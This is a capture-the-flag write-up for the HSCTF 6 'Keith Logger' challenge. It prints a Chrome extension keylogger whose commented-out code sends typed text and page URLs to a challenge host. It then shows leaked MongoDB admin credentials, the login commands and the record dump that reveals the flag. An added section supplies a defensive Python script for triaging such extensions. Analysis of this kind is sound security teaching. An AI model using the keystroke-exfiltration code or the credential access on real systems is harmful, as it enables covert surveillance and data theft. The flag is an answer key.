HSCTF 6 Writeup - Keith Logger
Question
Keith is up to some evil stuff! Can you figure out what he's doing and find the flag?
Solution
The attachment is a Chrome extension (a .crx file).
Opening it with 7-Zip shows a content.js inside.
var timeout_textarea;
var xhr_textarea;
$("textarea").on("keyup", function() {
  if (timeout_textarea) {
    clearTimeout(timeout_textarea);
  }
  if (xhr_textarea) {
    xhr_textarea.abort();
  }
  // debounce: fire 2 seconds after the last keystroke
  timeout_textarea = setTimeout(function() {
    var xhr = new XMLHttpRequest();
    /* xhr.open(
         "GET",
         "https://keith-logger.web.chal.hsctf.com/api/record?text=" +
           encodeURIComponent($("textarea").val()) +
           "&url=" + encodeURIComponent(window.location.href),
         true
       ); */
    // send a request to admin whenever something is logged, not needed anymore after testing
    /* xhr.open(
         "GET",
         "https://keith-logger.web.chal.hsctf.com/api/admin",
         true
       ); */
    xhr.send();
  }, 2000);
});
The commented-out code contains URLs, so let's try accessing them.
root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/record?text=aaa&url=bbb"
{'text': 'aaa', 'url': 'bbb', 'time': '13:47:05.441928'}
root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/admin"
didn't have time to implement this page yet. use admin:keithkeithkeith@keith-logger-mongodb.web.chal.hsctf.com:27017 for now
Another URL turned up, this time with credentials.
root@kali:~# curl "keith-logger-mongodb.web.chal.hsctf.com:27017"
It looks like you are trying to access MongoDB over HTTP on the native driver port.
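As an added example (not part of the original writeup), the following Python script performs the static triage a defender would run on an unpacked extension: it pulls every URL literal out of content.js (including the ones hidden in comments), looks for keystroke listeners and network APIs, and combines them into a "keylogger-shaped" verdict. It also scans an HTTP response body for a credentialed connection string of the form user:password@host:port, which is exactly what the /api/admin endpoint above leaks. Both inputs are embedded inline, copied from the writeup, so the script runs offline; the regexes and the verdict rule are this example's own heuristics, not part of any tool.

```python
"""Static triage of a browser-extension content script for keylogger behaviour."""
import re
from urllib.parse import urlparse

# Constructed input: the content.js recovered from the .crx, embedded so the script
# runs offline. The exfiltration endpoint survives only inside comments, which is
# why the URL scan below deliberately does not strip comments first.
SAMPLE_CONTENT_JS = r'''
var timeout_textarea;
var xhr_textarea;
$("textarea").on("keyup", function() {
  if (timeout_textarea) { clearTimeout(timeout_textarea); }
  if (xhr_textarea) { xhr_textarea.abort(); }
  timeout_textarea = setTimeout(function() {
    var xhr = new XMLHttpRequest();
    /* xhr.open("GET", "https://keith-logger.web.chal.hsctf.com/api/record?text="
         + encodeURIComponent($("textarea").val())
         + "&url=" + encodeURIComponent(window.location.href), true); */
    // send a request to admin whenever something is logged
    /* xhr.open("GET", "https://keith-logger.web.chal.hsctf.com/api/admin", true); */
    xhr.send();
  }, 2000);
});
'''

# Constructed input: the body returned by /api/admin, as shown in the writeup.
SAMPLE_ADMIN_RESPONSE = ("didn't have time to implement this page yet. use "
                         "admin:keithkeithkeith@keith-logger-mongodb.web.chal.hsctf.com:27017 for now")

URL_RE = re.compile(r'https?://[^\s"\'<>)]+')
# jQuery .on("keyup", ...) and DOM addEventListener("keyup", ...) on input-related events
KEY_EVENT_RE = re.compile(
    r'(?:\.on|addEventListener)\(\s*["\'](keyup|keydown|keypress|input|change)["\']')
# Browser APIs that can move data off the page
NETWORK_RE = re.compile(r'\b(XMLHttpRequest|fetch|sendBeacon|WebSocket)\b|\$\.(ajax|get|post)\b')
# user:password@host[:port]: a credentialed connection string in plain text
CRED_RE = re.compile(r'\b([A-Za-z0-9_.-]+):([^\s@/]+)@([A-Za-z0-9.-]+(?::\d{1,5})?)')


def extract_urls(src):
    """Return unique URL literals in order of appearance, comments included."""
    seen = []
    for url in URL_RE.findall(src):
        url = url.rstrip('.,;')
        if url not in seen:
            seen.append(url)
    return seen


def contacted_hosts(src):
    """Hosts the script could talk to, taken from every URL literal."""
    hosts = []
    for url in extract_urls(src):
        host = urlparse(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def keystroke_events(src):
    """Input-related events the script listens for."""
    return sorted(set(KEY_EVENT_RE.findall(src)))


def network_apis(src):
    """Network-capable APIs referenced by the script."""
    found = set()
    for m in NETWORK_RE.finditer(src):
        found.add(m.group(1) or '$.' + m.group(2))
    return sorted(found)


def find_credentials(text):
    """Credentialed connection strings (user:password@host) in a response body or script."""
    return [{'user': user, 'host': host} for user, _pw, host in CRED_RE.findall(text)]


def triage(src):
    """Keystroke capture + a network API + a remote host = keylogger-shaped."""
    events = keystroke_events(src)
    apis = network_apis(src)
    hosts = contacted_hosts(src)
    return {
        'keystroke_events': events,
        'network_apis': apis,
        'hosts': hosts,
        'keylogger_shaped': bool(events and apis and hosts),
    }


if __name__ == '__main__':
    for key, value in triage(SAMPLE_CONTENT_JS).items():
        print(f'{key}: {value}')
    for cred in find_credentials(SAMPLE_ADMIN_RESPONSE):
        print(f"credential leak: user={cred['user']} host={cred['host']}")
```

Run it as-is and it reports the keyup listener, the XMLHttpRequest use, the keith-logger host and the leaked admin credential; point SAMPLE_CONTENT_JS at any other content script to triage it the same way. Scanning comments is the point: a shipped extension with its exfil code commented out still tells you where the data was meant to go.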
Connecting with a MongoDB client looks like the way forward.
The mongo command is needed for that.
On Kali Linux it can be installed with the following steps.
Connect, then list the databases and collections.
root@kali:~# mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase admin
MongoDB shell version v4.0.10
connecting to: mongodb://keith-logger-mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("ea9498a4-faa7-4a40-9613-9fc71f6c94f2") }
MongoDB server version: 4.0.10
> show dbs
database  0.000GB
> use database
switched to db database
> show collections
collection
So there is a database named database containing a collection named collection.
> db.collection.find()
{ "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" }
{ "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" }
{ "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" }
{ "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" }
{ "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" }
{ "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" }
Got the flag.
hsctf{watch_out_for_keyloggers}